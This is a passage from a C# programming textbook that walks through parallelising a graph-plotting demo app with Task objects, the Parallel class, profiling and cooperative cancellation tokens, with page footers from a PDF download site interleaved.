method of the StopWatch type creates a new instance of a StopWatch
object and starts it running. You can query the running time of a
StopWatch object by examining the ElapsedMilliseconds property.
The generateGraphData method populates the data array with the data
for the graph to be displayed by the WriteableBitmap object. You will
examine this method in the next step.
When the generateGraphData method has completed, the elapsed time
(in milliseconds) appears in the duration TextBox control.
The final block of code creates the graphBitMap WriteableBitMap
object. The information held in the data array is copied into this object
for rendering. The simplest technique is to create an in-memory stream
that can be used to populate the PixelBuffer property of the
WriteableBitmap object. You can then use the Write method of this
stream to copy the contents of the data array into this buffer. The
Invalidate method of the WriteableBitmap class requests that the
operating system redraws the bitmap by using the information held in
the buffer. The Source property of an Image control specifies the data
that the Image control should display. The final statement sets the
Source property to the WriteableBitmap object.
6. Examine the code for the generateGraphData method, shown here:
Click here to view code image
private void generateGraphData(byte[] data)
{
double a = pixelWidth / 2;
double b = a * a;
double c = pixelHeight / 2;
for (double x = 0; x < a; x++)
{
double s = x * x;
double p = Math.Sqrt(b - s);
for (double i = -p; i < p; i += 3)
{
double r = Math.Sqrt(s + i * i) / a;
double q = (r - 1) * Math.Sin(24 * r);
double y = i / 3 + (q * c);
plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y +
Download from finelybook [email protected]
777
(pixelHeight / 2)));
plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
}
}
}
This method performs a series of calculations to plot the points for a
rather complex graph. (The actual calculation is unimportant; it just
generates a graph that looks attractive.) As it calculates each point, it
calls the plotXY method to set the appropriate bytes in the data array that
correspond to these points. The points for the graph are reflected around
the x-axis, so the plotXY method is called twice for each calculation:
once for the positive value of the x-coordinate, and once for the negative
value.
7. Examine the plotXY method:
Click here to view code image
private void plotXY(byte[] data, int x, int y)
{
int pixelIndex = (x + y * pixelWidth) * bytesPerPixel;
data[pixelIndex] = blueValue;
data[pixelIndex + 1] = greenValue;
data[pixelIndex + 2] = redValue;
data[pixelIndex + 3] = 0xBF;
}
This method sets the appropriate bytes in the data array that corresponds
to x- and y-coordinates passed in as parameters. Each point plotted
corresponds to a pixel, and each pixel consists of 4 bytes, as described
earlier. Any pixels left unset are displayed as black. The value 0xBF for
the alpha blend byte indicates that the corresponding pixel should be
displayed with a moderate intensity; if you decrease this value, the pixel
will become fainter, while setting the value to 0xFF (the maximum
value for a byte) will display the pixel at its brightest intensity.
8. On the Debug menu, click Start Without Debugging to build and run the
application.
9. When the GraphDemo window appears, click Plot Graph, and then wait.
Please be patient. The application typically takes a couple of seconds to
generate and display the graph, and the application is unresponsive
Download from finelybook [email protected]
778
while this occurs. (Chapter 24 explains why this is, and also explains
how you can avoid this behavior.) The following image shows the
graph. Note the value in the Duration (ms) label in the following figure.
In this case, the application took 1206 milliseconds (ms) to generate the
data. Note that this duration does not include the time to actually render
the graph, which might be another few seconds.
Note The application was run on a computer with a multicore
processor running at 3.10 GHz. Your times might vary if you are
using a slower or faster processor with a different number of cores.
10. Click Plot Graph again and take note of the time required to redraw the
graph. Repeat this action several times to obtain an average value.
Download from finelybook [email protected]
779
Note You might find that occasionally the graph takes an extended
time to appear. This tends to occur if you are running close to the
memory capacity of your computer and Windows has to page data
between memory and disk. If you encounter this phenomenon,
discard this time and do not include it when calculating your
average.
11. Leave the application running and right-click an empty area of the
Windows taskbar. On the shortcut menu that appears, click Task
Manager.
Note An alternative way to launch Task Manager is to type Task
Manager into the Windows Search box in the taskbar, and then
press Enter.
12. In the Task Manager window, click the Performance tab and display the
CPU utilization. If the Performance tab is not visible, click More
Details. Right-click the CPU Utilization graph, point to Change Graph
To, and then click Overall Utilization. This action causes Task Manager
to display the utilization of all the processor cores running on your
computer in a single chart. Wait for a minute or so for the CPU
performance to settle down. The following image shows the
Performance tab of Task Manager configured in this way:
Download from finelybook [email protected]
780
13. Return to the GraphDemo application and adjust the size and position of
the application window and the Task Manager window so that both are
visible.
14. Wait for the CPU utilization to level off, and then, in the GraphDemo
window, click Plot Graph.
15. Wait for the CPU utilization to level off again, and then click Plot Graph
again.
16. Repeat step 16 several times, waiting for the CPU utilization to level off
between clicks.
17. In the Task Manager window, observe the CPU utilization. Your results
will vary, but on a dual-core processor, the CPU utilization will
probably be somewhere around 50–55 percent while the graph was
Download from finelybook [email protected]
781
being generated. On a quad-core machine, the CPU utilization will
likely be somewhere between 25 and 30 percent, as shown in the image
that follows. Note that other factors, such as the type of graphics card in
your computer, can also impact the performance:
18. Close the application and return to Visual Studio 2017.
You now have a baseline for the time the application takes to perform its
calculations. However, it is clear from the CPU usage displayed by Task
Manager that the application is not making full use of the processing
resources available. On a dual-core machine, it is using just over half of the
CPU power, and on a quad-core machine, it is employing a little more than a
quarter of the CPU. This phenomenon occurs because the application is
single-threaded, and in a Windows application, a single thread can provide
work only to a single core on a multicore processor. To spread the load over
Download from finelybook [email protected]
782
all the available cores, you need to divide the application into tasks and
arrange for each task to be executed by a separate thread, each running on a
different core. This is what you will do next.
Using Performance Explorer to identify CPU
bottlenecks
The GraphDemo application was specifically designed to create a CPU
bottleneck at a known point (in the generateGraphData method). In the
real world you might be aware that something is causing your
application to run slowly and become unresponsive, but you might not
know where the offending code is located. This is where the Visual
Studio Performance Explorer and Profiler can prove invaluable.
The Profiler can sample the run-time state of the application
periodically and capture information about which statement was
running at the time. The more frequently a particular line of code is
executed and the longer this line takes to run, the more frequently this
statement will be observed. The Profiler uses this data to generate a run-
time profile of the application and produce a report that details the
hotspots in your code. These hotspots can be useful in identifying areas
on which you should focus your optimizations. The following optional
steps walk you through this process.
Note Performance Explorer and the Profiler are not available in
Visual Studio 2017 Community Edition.
1. In Visual Studio, on the Debug menu, point to Profiler, point to
Performance Explorer, and then click New Performance Session.
The Performance Explorer window should appear in Visual Studio:
Download from finelybook [email protected]
783
2. In Performance Explorer, right-click Targets and then click Add
Target Project. The GraphDemo application will be added as a
target.
3. In the Performance Explorer menu bar, click Actions, and then
click Start Profiling. The GraphDemo application starts running.
4. Click Plot Graph and wait for the graph to be generated. Repeat
this process several times, and then close the GraphDemo
application.
5. Return to Visual Studio and wait while the Profiler analyzes the
sampling data collected and generates a report that should look
similar to this:
Download from finelybook [email protected]
784
This report shows the CPU utilization (which should be similar to
that which you observed using Task Manager earlier, with peaks
whenever you clicked Plot Graph), and the Hot Path for the
application. This path identifies the sequence through the
application that consumed the most processing. In this case, the
application spent 93.46 percent of the time in the plotButton_Click
method, 80.08 percent of the time was spent executing the
generateGraphData method, and 33.85 percent of the time was
spent in the plotXY method. A considerable amount of time (22.20
percent) was also consumed by the runtime (coreclr.dll).
Note that you can zoom in on particular areas of the CPU
utilization graph (click and drag using the mouse), and filter the
report to cover only the zoomed-in part of the sampled data.
6. In the Hot Path part of the report, click the
GraphDemo.MainPage.generateGraphData method. The Report
window displays the details of the method, together with the
proportion of the CPU time spent executing the most expensive
statements:
Download from finelybook [email protected]
785
In this case, you can see that the code in the for loop should be
the primary target for any optimization effort.
Modify the GraphDemo application to use Task objects
1. Return to Visual Studio 2017, and display the MainPage.xaml.cs file in
the Code and Text Editor window, if it is not already open.
2. Examine the generateGraphData method.
The purpose of this method is to populate the items in the data array. It
iterates through the array by using the outer for loop based on the x loop
control variable, highlighted in bold here:
Click here to view code image
private void generateGraphData(byte[] data)
{
double a = pixelWidth / 2;
double b = a * a;
double c = pixelHeight / 2;
Download from finelybook [email protected]
786
for (double x = 0; x < a; x ++)
{
double s = x * x;
double p = Math.Sqrt(b - s);
for (double i = -p; i < p; i += 3)
{
double r = Math.Sqrt(s + i * i) / a;
double q = (r - 1) * Math.Sin(24 * r);
double y = i / 3 + (q * c);
plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
}
}
}
The calculation performed by one iteration of this loop is independent of
the calculations performed by the other iterations. Therefore, it makes
sense to partition the work performed by this loop and run different
iterations on a separate processor.
3. Modify the definition of the generateGraphData method to take two
additional int parameters, called partitionStart and partitionEnd, as
shown in bold in the following example:
Click here to view code image
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd)
{
...
}
4. In the generateGraphData method, change the outer for loop to iterate
between the values of partitionStart and partitionEnd, as shown here in
bold:
Click here to view code image
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd)
{
...
for (double x = partitionStart; x < partitionEnd; x++)
{
...
}
}
Download from finelybook [email protected]
787
5. In the Code and Text Editor window, add the following using directive
to the list at the top of the MainPage.xaml.cs file:
using System.Threading.Tasks;
6. In the plotButton_Click method, comment out the statement that calls
the generateGraphData method and add the statement shown in bold in
the following code. This new statement creates a Task object and starts it
running:
Click here to view code image
...
Stopwatch watch = Stopwatch.StartNew();
// generateGraphData(data);
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 4));
...
The task runs the code specified by the lambda expression. The values
for the partitionStart and partitionEnd parameters indicate that the Task
object calculates the data for the first half of the graph. (The data for the
complete graph consists of points plotted for the values between 0 and
pixelWidth / 2.)
7. Add another statement that creates and runs a second Task object on
another thread, as shown in the following bold-highlighted code:
Click here to view code image
...
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 4));
Task second = Task.Run(() => generateGraphData(data, pixelWidth
/ 4, pixelWidth / 2));
...
This Task object invokes the generateGraphData method and calculates
the data for the values between pixelWidth / 4 and pixelWidth / 2.
8. Add the following statement shown in bold that waits for both Task
objects to complete their work before continuing:
Click here to view code image
...
Task second = Task.Run(() => generateGraphData(data, pixelWidth
Download from finelybook [email protected]
788
/ 4, pixelWidth / 2));
Task.WaitAll(first, second);
...
9. On the Debug menu, click Start Without Debugging to build and run the
application. Adjust the display to ensure that you can see the Task
Manager window displaying the CPU utilization.
10. In the GraphDemo window, click Plot Graph. In the Task Manager
window, wait for the CPU utilization to level off.
11. Repeat step 10 several more times, waiting for the CPU utilization to
level off between clicks. Make a note of the duration recorded each time
you click the button, and then calculate the average.
You should see that the application runs significantly quicker than it did
previously. On my computer, the typical time dropped to 735
milliseconds—a reduction in time of approximately 40 percent.
In most cases, the time required to perform the calculations will be cut
by nearly half, but the application still has some single-threaded
elements, such as the logic that actually displays the graph after the data
has been generated. This is why the overall time is still more than half
the time taken by the previous version of the application.
12. Switch to the Task Manager window.
You should see that the application uses more CPU resources than
before. On my quad-core machine, the CPU usage peaked at
approximately 40 percent each time I clicked Plot Graph. This happens
because the two tasks were each run on separate cores, but the remaining
two cores were left unoccupied. If you have a dual-core machine, you
will likely see processor utilization briefly approach 80–90 percent each
time the graph is generated.
Download from finelybook [email protected]
789
Note You should take the graph of CPU utilization in Task
Manager as a general guide only. The accuracy is determined by
the sampling rate of Windows. This means that if a CPU spends a
very short time with high usage, it might not always be reported; it
could fall between samples. This phenomenon also accounts for
why some peaks appear to be truncated plateaus rather than tall
points.
You should also notice that the taken reported to generate the data by the
GraphDemo application drops considerably, to approximately 60
Download from finelybook [email protected]
790
percent of that reported when it was running single-threaded.
13. Close the GraphDemo application and return to Visual Studio 2017.
Note If you have a quad-core computer, you can increase the CPU
utilization and reduce the time further by adding two more Task objects
and dividing the work into four chunks in the plotButton_Click method,
as shown here in bold:
Click here to view code image
...
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 8));
Task second = Task.Run(() => generateGraphData(data, pixelWidth
/ 8,
pixelWidth / 4));
Task third = Task.Run(() => generateGraphData(data, pixelWidth /
4,
pixelWidth * 3 / 8));
Task fourth = Task.Run(() => generateGraphData(data, pixelWidth
* 3 / 8,
pixelWidth / 2));
Task.WaitAll(first, second, third, fourth);
...
If you have only a dual-core processor, you can still try this
modification, and you should notice a small beneficial effect on the
time. This is primarily because of the way in which the algorithms used
by the CLR optimize the way in which the threads for each task are
scheduled.
Abstracting tasks by using the Parallel class
By using the Task class, you have complete control over the number of tasks
your application creates. However, you had to modify the design of the
application to accommodate the use of Task objects. You also had to add
code to synchronize operations; the application can render the graph only
Download from finelybook [email protected]
791
when all the tasks have completed. In a complex application, the
synchronization of tasks can become a nontrivial process that is easily prone
to mistakes.
With the Parallel class, you can parallelize some common programming
constructs without having to redesign an application. Internally, the Parallel
class creates its own set of Task objects, and it synchronizes these tasks
automatically when they have completed. The Parallel class is located in the
System.Threading.Tasks namespace and provides a small set of static
methods that you can use to indicate that code should be run in parallel if
possible. These methods are as follows:
Parallel.For You can use this method in place of a C# for statement.
It defines a loop in which iterations can run in parallel by using tasks.
This method is heavily overloaded, but the general principle is the
same for each: you specify a start value, an end value, and a reference
to a method that takes an integer parameter. The method is executed for
every value between the start value and one below the end value
specified, and the parameter is populated with an integer that specifies
the current value. For example, consider the following simple for loop
that performs each iteration in sequence:
for (int x = 0; x < 100; x++)
{
// Perform loop processing
}
Depending on the processing performed by the body of the loop, you
might be able to replace this loop with a Parallel.For construct that can
perform iterations in parallel, like this:
Click here to view code image
Parallel.For(0, 100, performLoopProcessing);
...
private void performLoopProcessing(int x)
{
// Perform loop processing
}
Using the overloads of the Parallel.For method, you can provide local
data that is private to each thread, specify various options for creating
the tasks run by the For method, and create a ParallelLoopState object
Download from finelybook [email protected]
792
that can be used to pass state information to other concurrent iterations
of the loop. (Using a ParallelLoopState object is described later in this
chapter.)
Parallel.ForEach<T> You can use this method in place of a C#
foreach statement. Like the For method, ForEach defines a loop in
which iterations can run in parallel. You specify a collection that
implements the IEnumerable<T> generic interface and a reference to a
method that takes a single parameter of type T. The method is executed
for each item in the collection, and the item is passed as the parameter
to the method. Overloads are available with which you can provide
private local thread data and specify options for creating the tasks run
by the ForEach method.
Parallel.Invoke You can use this method to execute a set of
parameterless method calls as parallel tasks. You specify a list of
delegated method calls (or lambda expressions) that take no parameters
and do not return values. Each method call can be run on a separate
thread, in any order. For example, the following code makes a series of
method calls:
doWork();
doMoreWork();
doYetMoreWork();
You can replace these statements with the following code, which
invokes these methods by using a series of tasks:
Parallel.Invoke(
doWork,
doMoreWork,
doYetMoreWork
);
You should bear in mind that the Parallel class determines the actual
degree of parallelism appropriate for the environment and workload of the
computer. For example, if you use Parallel.For to implement a loop that
performs 1,000 iterations, the Parallel class does not necessarily create 1,000
concurrent tasks (unless you have an exceptionally powerful processor with
1,000 cores). Instead, the Parallel class creates what it considers to be the
optimal number of tasks that balances the available resources against the
requirement to keep the processors occupied. A single task might perform
Download from finelybook [email protected]
793
multiple iterations, and the tasks coordinate with each other to determine
which iterations each task will perform. An important consequence of this is
that you cannot guarantee the order in which the iterations are executed, so
you must ensure that there are no dependencies between iterations; otherwise,
you might encounter unexpected results, as you will see later in this chapter.
In the next exercise, you will return to the original version of the
GraphDemo application and use the Parallel class to perform operations
concurrently.
Use the Parallel class to parallelize operations in the GraphDemo
application
1. Using Visual Studio 2017, open the GraphDemo solution, which is
located in the \Microsoft Press\ VCSBS\Chapter 23\Parallel GraphDemo
folder in your Documents folder.
This is a copy of the original GraphDemo application. It does not use
tasks yet.
2. In Solution Explorer, in the GraphDemo project, expand the
MainPage.xaml node, and then double-click MainPage.xaml.cs to
display the code for the form in the Code and Text Editor window.
3. Add the following using directive to the list at the top of the file:
using System.Threading.Tasks;
4. Locate the generateGraphData method. It looks like this:
Click here to view code image
private void generateGraphData(byte[] data)
{
double a = pixelWidth / 2;
double b = a * a;
double c = pixelHeight / 2;
for (double x = 0; x < a; x++)
{
double s = x * x;
double p = Math.Sqrt(b - s);
for (double i = -p; i < p; i += 3)
{
double r = Math.Sqrt(s + i * i) / a;
double q = (r - 1) * Math.Sin(24 * r);
double y = i / 3 + (q * c);
Download from finelybook [email protected]
794
plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
}
}
}
The outer for loop that iterates through values of the variable x is a
prime candidate for parallelization. You might also consider the inner
loop based on the variable i. However, if you have nested loops such as
those that occur in this code, it is good practice to parallelize the outer
loops first and then test to see whether the performance of the
application is sufficient. If it is not, work your way through nested loops
and parallelize them working from outer to inner loops, testing the
performance after modifying each one. You will find that in many cases
parallelizing outer loops has the most impact on performance, whereas
the effects of modifying inner loops becomes more marginal.
5. Cut the code in the body of the for loop, and create a new private void
method called calculateData with this code. The calculateData method
should take an int parameter called x, and a byte array called data. Also,
move the statements that declare the local variables a, b, and c from the
generateGraphData method to the start of the calculateData method.
The following code shows the generateGraphData method with this
code removed and the calculateData method (do not try to compile this
code yet):
Click here to view code image
private void generateGraphData(byte[] data)
{
for (double x = 0; x < a; x++)
{
}
}
private void calculateData(int x, byte[] data)
{
double a = pixelWidth / 2;
double b = a * a;
double c = pixelHeight / 2;
double s = x * x;
double p = Math.Sqrt(b - s);
for (double i = -p; i < p; i += 3)
Download from finelybook [email protected]
795
{
double r = Math.Sqrt(s + i * i) / a;
double q = (r - 1) * Math.Sin(24 * r);
double y = i / 3 + (q * c);
plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
}
}
6. In the generateGraphData method, replace the for loop with the
following statement that calls the static Parallel.For method:
Click here to view code image
private void generateGraphData(byte[] data)
{
Parallel.For(0, pixelWidth / 2, x => calculateData(x,
data));
}
This code is the parallel equivalent of the original for loop. It iterates
through the values from 0 to pixelWidth / 2 – 1 inclusive. Each
invocation runs by using a task, and each task might run more than one
iteration. The Parallel.For method finishes only when all the tasks it has
created complete their work. Remember that the Parallel.For method
expects the final parameter to be a method that takes a single integer
parameter. It calls this method passing the current loop index as the
parameter. In this example, the calculateData method does not match
the required signature because it takes two parameters: an integer and a
byte array. For this reason, the code uses a lambda expression that acts
as an adapter that calls the calculateData method with the appropriate
arguments.
7. On the Debug menu, click Start Without Debugging to build and run the
application.
8. In the GraphDemo window, click Plot Graph. When the graph appears
in the GraphDemo window, record the time taken to generate the graph.
Repeat this action several times to get an average value.
You should notice that the application runs as least as quickly as the
previous version that used Task objects and possibly faster, depending
on the number of CPUs you have available. This is because the Parallel.
Download from finelybook [email protected]
796
For construct automatically takes advantage of all the available
processors, so on a dual core machine, it will use two processor cores,
on a quad core it will use four processor cores, and so on. You don’t
have to amend your code in any way to scale between processor
architectures.
9. Close the GraphDemo application and return to Visual Studio.
When not to use the Parallel class
You should be aware that despite appearances and the best efforts of the
.NET Framework development team at Microsoft, the Parallel class is not
magic—you cannot use it without due consideration and just expect your
applications to suddenly run significantly faster and produce the same results.
The purpose of the Parallel class is to parallelize CPU-bound, independent
areas of your code.
If you are not running CPU-bound code, parallelizing it might not
improve performance. In this case, the overhead of creating a task, running
this task on a separate thread, and waiting for the task to complete is likely to
be greater than the cost of running this method directly. The additional
overhead might account for only a few milliseconds each time a method is
called, but you should bear in mind the number of times that a method runs.
If the method call is located in a nested loop and is executed thousands of
times, all of these small overhead costs will add up. The general rule is to use
Parallel.Invoke only when it is worthwhile. You should reserve
Parallel.Invoke for operations that are computationally intensive; otherwise,
the overhead of creating and managing tasks can actually slow down an
application.
The other key consideration for using the Parallel class is that parallel
operations should be independent. For example, if you attempt to use
Parallel.For to parallelize a loop in which iterations have a dependency on
each other, the results will be unpredictable.
To see what I mean, look at the following code (you can find this example
in the ParallelLoop solution, which is located in the \Microsoft
Press\VCSBS\Chapter 23\ParallelLoop folder in your Documents folder):
Click here to view code image
Download from finelybook [email protected]
797
using System;
using System.Threading;
using System.Threading.Tasks;
namespace ParallelLoop
{
class Program
{
private static int accumulator = 0;
static void Main(string[] args)
{
for (int i = 0; i < 100; i++)
{
AddToAccumulator(i);
}
Console.WriteLine($"Accumulator is ");
}
private static void AddToAccumulator(int data)
{
if ((accumulator % 2) == 0)
{
accumulator += data;
}
else
{
accumulator -= data;
}
}
}
}
This program iterates through the values from 0 to 99 and calls the
AddToAccumulator method with each value in turn. The AddToAccumulator
method examines the current value of the accumulator variable and, if it is
even, adds the value of the parameter to the accumulator variable; otherwise,
it subtracts the value of the parameter. At the end of the program, the result is
displayed. If you run this program, the value output should be –100.
To increase the degree of parallelism in this simple application, you might
be tempted to replace the for loop in the Main method with Parallel.For, like
this shown in bold:
Click here to view code image
static void Main(string[] args)
{
Parallel.For (0, 100, AddToAccumulator);
Console.WriteLine($"Accumulator is ");
Download from finelybook [email protected]
798
}
However, there is no guarantee that the tasks created to run the various
invocations of the AddToAccumulator method will execute in any specific
sequence. (The code is also not thread-safe because multiple threads running
the tasks might attempt to modify the accumulator variable concurrently.)
The value calculated by the AddToAccumulator method depends on the
sequence being maintained, so the result of this modification is that the
application might now generate different values each time it runs. In this
simple case, you might not actually see any difference in the value calculated
because the AddToAccumulator method runs very quickly and the .NET
Framework might elect to run each invocation sequentially by using the same
thread. However, if you make the following change (shown in bold) to the
AddToAccumulator method, you will get different results:
Click here to view code image
private static void AddToAccumulator(int data)
{
if ((accumulator % 2) == 0)
{
accumulator += data;
Thread.Sleep(10); // wait for 10 milliseconds
}
else
{
accumulator -= data;
}
}
The Thread.Sleep method simply causes the current thread to wait for the
specified period of time. This modification simulates the thread, performing
additional processing, and affects the way in which the Parallel class
schedules the tasks, which now run on different threads, resulting in a
different sequence that calculates a different value.
The general rule is to use Parallel.For and Parallel.ForEach only if you
can guarantee that each iteration of the loop is independent, and test your
code thoroughly. A similar consideration applies to Parallel.Invoke: use this
construct to make method calls only if they are independent and the
application does not depend on them being run in a particular sequence.
Download from finelybook [email protected]
799
Canceling tasks and handling exceptions
A common requirement of applications that perform long-running operations
is the ability to stop those operations if necessary. However, you should not
simply abort a task, as this could leave the data in your application in an
indeterminate state. Instead, the Task class implements a cooperative
cancellation strategy. Cooperative cancellation enables a task to select a
convenient point at which to stop processing and also enables it to undo any
work it has performed prior to cancellation if necessary.
The mechanics of cooperative cancellation
Cooperative cancellation is based on the notion of a cancellation token. A
cancellation token is a structure that represents a request to cancel one or
more tasks. The method that a task runs should include a
System.Threading.CancellationToken parameter. An application that wants to
cancel the task sets the Boolean IsCancellationRequested property of this
parameter to true. The method running in the task can query this property at
various points during its processing. If this property is set to true at any point,
it knows that the application has requested that the task be canceled. Also, the
method knows what work it has done so far, so it can undo any changes if
necessary and then finish. Alternatively, the method can simply ignore the
request and continue running.
Tip You should examine the cancellation token in a task frequently, but
not so frequently that you adversely impact the performance of the task.
If possible, you should aim to check for cancellation at least every ten
milliseconds, but no more frequently than every millisecond.
An application obtains a CancellationToken by creating a
System.Threading.CancellationTokenSource object and querying the Token
property of this object. The application can then pass this CancellationToken
object as a parameter to any methods started by tasks that the application
Download from finelybook [email protected]
800
creates and runs. If the application needs to cancel the tasks, it calls the
Cancel method of the CancellationTokenSource object. This method sets the
IsCancellationRequested property of the CancellationToken passed to all the
tasks.
The code example that follows shows how to create a cancellation token
and use it to cancel a task. The initiateTasks method instantiates the
cancellationTokenSource variable and obtains a reference to the
CancellationToken object available through this variable. The code then
creates and runs a task that executes the doWork method. Later on, the code
calls the Cancel method of the cancellation token source, which sets the
cancellation token. The doWork method queries the IsCancellationRequested
property of the cancellation token. If the property is set, the method
terminates; otherwise, it continues running.
Click here to view code image
public class MyApplication
{
...
// Method that creates and manages a task
private void initiateTasks()
{
// Create the cancellation token source and obtain a
cancellation token
CancellationTokenSource cancellationTokenSource = new
CancellationTokenSource();
CancellationToken cancellationToken =
cancellationTokenSource.Token;
// Create a task and start it running the doWork method
Task myTask = Task.Run(() => doWork(cancellationToken));
...
if (...)
{
// Cancel the task
cancellationTokenSource.Cancel();
}
...
}
// Method run by the task
private void doWork(CancellationToken token)
{
...
// If the application has set the cancellation token, finish
processing
if (token.IsCancellationRequested)
Download from finelybook [email protected]
801
{
// Tidy up and finish
...
return;
}
// If the task has not been canceled, continue running as
normal
...
}
}
In addition to providing a high degree of control over the cancellation
processing, this approach is scalable across any number of tasks; you can
start multiple tasks and pass the same CancellationToken object to each of
them. If you call Cancel on the CancellationTokenSource object, each task
will check whether the IsCancellationRequested property has been set and
proceed accordingly.
You can also register a callback method (in the form of an Action
delegate) with the cancellation token by using the Register method. When an
application invokes the Cancel method of the corresponding
CancellationTokenSource object, this callback runs. However, you cannot
guarantee when this method executes; it might be before or after the tasks
have performed their own cancellation processing, or even during that
process.
Click here to view code image
...
cancellationToken,Register(doAdditionalWork);
...
private void doAdditionalWork()
{
// Perform additional cancellation processing
}
In the next exercise, you will add cancellation functionality to the
GraphDemo application.
Add cancellation functionality to the GraphDemo application
1. Using Visual Studio 2017, open the GraphDemo solution, which is
located in the \Microsoft Press\ VCSBS\Chapter 23\GraphDemo With
Cancellation folder in your Documents folder.
Download from finelybook [email protected]
802
This is a completed copy of the GraphDemo application from the earlier
exercise that uses tasks to improve processing throughput. The user
interface also includes a button named cancelButton that the user can
use to stop the tasks that calculate the data for the graph.
2. In Solution Explorer, in the GraphDemo project, double-click
MainPage.xaml to display the form in the Design View window. Note
the Cancel button that appears in the left pane of the form.
3. Open the MainPage.xaml.cs file in the Code and Text Editor window.
Locate the cancelButton_Click method.
This method runs when the user clicks Cancel. It is currently empty.
4. Add the following using directive to the list at the top of the file:
using System.Threading;
The types used by cooperative cancellation reside in this namespace.
5. Add a CancellationTokenSource field called tokenSource to the
MainPage class, and initialize it to null, as shown in the following code
in bold:
Click here to view code image
public sealed partial class MainPage : Page
{
...
private byte redValue, greenValue, blueValue;
private CancellationTokenSource tokenSource = null;
...
}
6. Find the generateGraphData method and add a CancellationToken
parameter called token to the method definition, as shown here in bold:
Click here to view code image
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd,
CancellationToken token)
{
...
}
7. In the generateGraphData method, at the start of the inner for loop, add
Download from finelybook [email protected]
803
the following code shown in bold to check whether cancellation has
been requested. If so, return from the method; otherwise, continue
calculating values and plotting the graph.
Click here to view code image
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd,
CancellationToken token)
{
double a = pixelWidth / 2;
double b = a * a;
double c = pixelHeight / 2;
for (double x = partitionStart; x < partitionEnd; x ++)
{
double s = x * x;
double p = Math.Sqrt(b - s);
for (double i = -p; i < p; i += 3)
{
if (token.IsCancellationRequested)
{
return;
}
double r = Math.Sqrt(s + i * i) / a;
double q = (r - 1) * Math.Sin(24 * r);
double y = i / 3 + (q * c);
plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y +
(pixelHeight / 2)));
}
}
}
8. In the plotButton_Click method, add the following statements shown in
bold that instantiate the tokenSource variable and retrieve the
CancellationToken object into a variable called token:
Click here to view code image
private void plotButton_Click(object sender, RoutedEventArgs e)
{
Random rand = new Random();
redValue = (byte)rand.Next(0xFF);
greenValue = (byte)rand.Next(0xFF);
blueValue = (byte)rand.Next(0xFF);
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
...
}
Download from finelybook [email protected]
804
9. Modify the statements in the plotButton_Click method that create and
run the two tasks, and pass the token variable as the final parameter to
the generateGraphData method as shown in bold:
Click here to view code image
...
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 4, token));
Task second = Task.Run(() => generateGraphData(data, pixelWidth
/ 4,
pixelWidth / 2, token));
...
10. Edit the definition of the plotButton_Click method and add the async
modifier as shown in bold here:
Click here to view code image
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
}
11. In the body of the plotButton_Click method, comment out the
Task.WaitAll statement that waits for the tasks to complete and replace it
with the following statements in bold that use the await operator instead.
Click here to view code image
...
// Task.WaitAll(first, second);
await first;
await second;
duration.Text = …;
...
The changes in these two steps are necessary because of the single-
threaded nature of the Windows user interface. Under normal
circumstances, when an event handler for a user interface component
such as a button starts running, event handlers for other user interface
components are blocked until the first event handler completes (even if
the event handler is using tasks). In this example, using the Task.WaitAll
method to wait for the tasks to complete would render the Cancel button
useless because the event handler for the Cancel button will not run until
the handler for the Plot Graph button completes, in which case there is
Download from finelybook [email protected]
805
no point in attempting to cancel the operation. In fact, as mentioned
earlier, when you click the Plot Graph button, the user interface is
completely unresponsive until the graph appears and the
plotButton_Click method finishes.
The await operator is designed to handle situations such as this. You can
use this operator only inside a method marked as async. Its purpose is to
release the current thread and wait for a task to complete in the
background. When that task finishes, control returns to the method,
which continues with the next statement. In this example, the two await
statements simply allow each of the tasks to complete in the
background. After the second task has finished, the method continues,
displaying the time taken for these tasks to complete in the duration
TextBlock. Note that it is not an error to await for a task that has already
completed; the await operator will simply return immediately and pass
control to the following statement.
More Info
Chapter 24 discusses the async modifier and the await operator in
detail.
12. Find the cancelButton_Click method. Add the code shown here in bold
to this method:
Click here to view code image
private void cancelButton_Click(object sender, RoutedEventArgs
e)
{
if (tokenSource != null)
{
tokenSource.Cancel();
}
}
This code checks that the tokenSource variable has been instantiated. If
it has, the code invokes the Cancel method on this variable.
13. On the Debug menu, click Start Without Debugging to build and run the
Download from finelybook [email protected]
806
application.
14. In the GraphDemo window, click Plot Graph, and verify that the graph
appears as it did before. However, you should notice that it takes slightly
longer to generate the graph than before. This is because of the
additional check performed by the generateGraphData method.
15. Click Plot Graph again, and then quickly click Cancel.
If you are swift and click Cancel before the data for the graph is
generated, this action causes the methods being run by the tasks to
return. The data is not complete, so the graph appears with “holes,” as
shown in the following figure; the size of the holes depends on how
quickly you clicked Cancel.
16. Close the GraphDemo application and return to Visual Studio.
You can determine whether a task completed or was canceled by
examining the Status property of the Task object. The Status property
Download from finelybook [email protected]
807
contains a value from the System.Threading.Tasks.TaskStatus enumeration.
The following list describes some of the status values that you might
commonly encounter (there are others):
Created This is the initial state of a task. It has been created but has not
yet been scheduled to run.
WaitingToRun The task has been scheduled but has not yet started to
run.
Running The task is currently being executed by a thread.
RanToCompletion The task completed successfully without any
unhandled exceptions.
Canceled The task was canceled before it could start running, or it
acknowledged cancellation and completed without throwing an
exception.
Faulted The task terminated because of an exception.
